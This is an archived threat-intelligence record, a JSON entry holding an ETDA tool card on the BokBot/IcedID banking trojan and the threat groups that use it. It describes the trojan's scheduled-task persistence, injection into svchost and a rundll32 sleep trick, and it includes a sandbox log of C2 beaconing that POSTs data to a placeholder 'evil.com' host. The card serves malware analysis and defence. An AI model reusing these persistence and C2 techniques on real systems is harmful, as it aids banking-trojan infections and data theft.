{
	"id": "da3e8b77-c7dc-4637-86ce-2c9b226aa686",
	"created_at": "2026-04-06T00:15:18.1517Z",
	"updated_at": "2026-04-10T03:37:23.877862Z",
	"deleted_at": null,
	"sha1_hash": "361a12e030c6a57777ab71dbb1e7d06180861c7b",
	"title": "Threat Group Cards: A Threat Actor Encyclopedia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64761,
	"plain_text": "Threat Group Cards: A Threat Actor Encyclopedia\r\nArchived: 2026-04-05 20:40:32 UTC\r\nTool: BokBot\r\nNames\r\nBokBot\r\nIcedID\r\nIceID\r\nCategory Malware\r\nType Banking trojan\r\nDescription Analysis Observations:\r\n• It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n• Name: Update\r\n• Trigger: At Log on\r\n• Action: %LocalAppData%\\$Example\\waroupada.exe /i\r\n• Conditions: Stop if the computer ceases to be idle.\r\n• The sub-directory within %LocalAppData% appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n• The filename remained static during analysis.\r\n• The original malware exe (e.g. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it.\r\n• If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n• If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes, resulting in C2 communication.\r\n• Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\nrundll32.exe kernel32,Sleep -s\r\n• Sets up a local listener to proxy traffic on 127.0.0.1:50000\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11 HTTP/1.1\r\nhttps://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1\r\nPage 1 of 4\r\n\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: \u003c(POSTDATA)\u003e\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0\u0026b=4FC0302F4C59D8CDB8\u0026d=0\u0026e=63\u0026f=0\u0026g=0\u0026h=0\u0026r=0\u0026i=266390\u0026j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\nInformation\r\nMalpedia, AlienVault OTX\r\nLast change to this tool card: 15 February 2023\r\nAll groups using tool BokBot\r\nChanged Name Country Observed\r\nAPT groups\r\n TA2101, Maze Team [Unknown] 2019-Feb 2024\r\nOther groups\r\n Lunar Spider 2019\r\n TA551, Shathak 2016-Jan 2021\r\n3 groups listed (1 APT, 2 other, 0 unknown)\r\nSource: https://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://apt.etda.or.th/cgi-bin/listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1"
	],
	"report_names": [
		"listgroups.cgi?u=f1341974-6e5c-4254-8f53-b231fcda1bd1"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c2385aea-d30b-4dbc-844d-fef465cf3ea9",
			"created_at": "2023-01-06T13:46:38.916521Z",
			"updated_at": "2026-04-10T02:00:03.144667Z",
			"deleted_at": null,
			"main_name": "LUNAR SPIDER",
			"aliases": [
				"GOLD SWATHMORE"
			],
			"source_name": "MISPGALAXY:LUNAR SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e9f85280-337c-4321-b872-0919f8ef64a6",
			"created_at": "2022-10-25T16:07:24.261761Z",
			"updated_at": "2026-04-10T02:00:04.914455Z",
			"deleted_at": null,
			"main_name": "TA2101",
			"aliases": [
				"Gold Village",
				"Maze Team",
				"TA2101",
				"Twisted Spider"
			],
			"source_name": "ETDA:TA2101",
			"tools": [
				"7-Zip",
				"Agentemis",
				"BokBot",
				"Buran",
				"ChaCha",
				"Cobalt Strike",
				"CobaltStrike",
				"Egregor",
				"IceID",
				"IcedID",
				"Mimikatz",
				"PsExec",
				"SharpHound",
				"VegaLocker",
				"WinSCP",
				"cobeacon",
				"nmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7cfe3bc9-7a6c-4ee1-a635-5ea7b947147f",
			"created_at": "2024-06-19T02:03:08.122318Z",
			"updated_at": "2026-04-10T02:00:03.652418Z",
			"deleted_at": null,
			"main_name": "GOLD SWATHMORE",
			"aliases": [
				"Lunar Spider "
			],
			"source_name": "Secureworks:GOLD SWATHMORE",
			"tools": [
				"Cobalt Strike",
				"GlobeImposter",
				"Gozi",
				"Gozi Trojan",
				"IcedID",
				"Latrodectus",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "475ea823-9e47-4098-b235-0900bc1a5362",
			"created_at": "2022-10-25T16:07:24.506596Z",
			"updated_at": "2026-04-10T02:00:05.015497Z",
			"deleted_at": null,
			"main_name": "Lunar Spider",
			"aliases": [
				"Gold SwathMore"
			],
			"source_name": "ETDA:Lunar Spider",
			"tools": [
				"BokBot",
				"IceID",
				"IcedID",
				"NeverQuest",
				"Vawtrak",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3c864b3-fac9-4d56-8500-7c06c829fbf8",
			"created_at": "2023-01-06T13:46:39.071873Z",
			"updated_at": "2026-04-10T02:00:03.203749Z",
			"deleted_at": null,
			"main_name": "TA2101",
			"aliases": [
				"GOLD VILLAGE",
				"Storm-0216",
				"DEV-0216",
				"UNC2198",
				"TUNNEL SPIDER",
				"Maze Team",
				"TWISTED SPIDER"
			],
			"source_name": "MISPGALAXY:TA2101",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434518,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.pdf",
		"text": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.txt",
		"img": "https://archive.orkl.eu/361a12e030c6a57777ab71dbb1e7d06180861c7b.jpg"
	}
}